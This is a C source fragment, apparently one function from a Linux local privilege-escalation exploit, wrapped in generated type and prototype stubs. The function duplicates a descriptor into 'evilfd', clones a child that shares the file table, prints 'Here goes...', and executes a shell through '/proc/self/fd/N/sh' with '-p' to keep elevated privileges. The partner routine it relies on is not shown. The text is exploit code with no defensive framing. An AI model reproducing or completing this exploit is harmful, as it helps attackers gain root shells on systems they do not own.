
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int CLONE_FILES ;
 int CLONE_VFORK ;
 int child2 ;
 int clone (int ,char*,int,void*) ;
 int dup (int ) ;
 int err (int,char*) ;
 int evilfd ;
 int execl (char*,char*,char*,int *) ;
 int perror (char*) ;
 int printf (char*) ;
 int sprintf (char*,char*,int) ;

__attribute__((used)) static int child1(const char *mountpoint)
{
   char child2stack[2048];
   char evil_path[1024];

   evilfd = dup(0);
   if (evilfd == -1)
       err(1, "dup");

   if (clone(child2, child2stack,
         CLONE_FILES | CLONE_VFORK,
         (void *)mountpoint) == -1)
       err(1, "clone");

   printf("Here goes...\n");

   sprintf(evil_path, "/proc/self/fd/%d/sh", evilfd);
   execl(evil_path, "sh", "-p", ((void*)0));
   perror(evil_path);
   return 1;
}
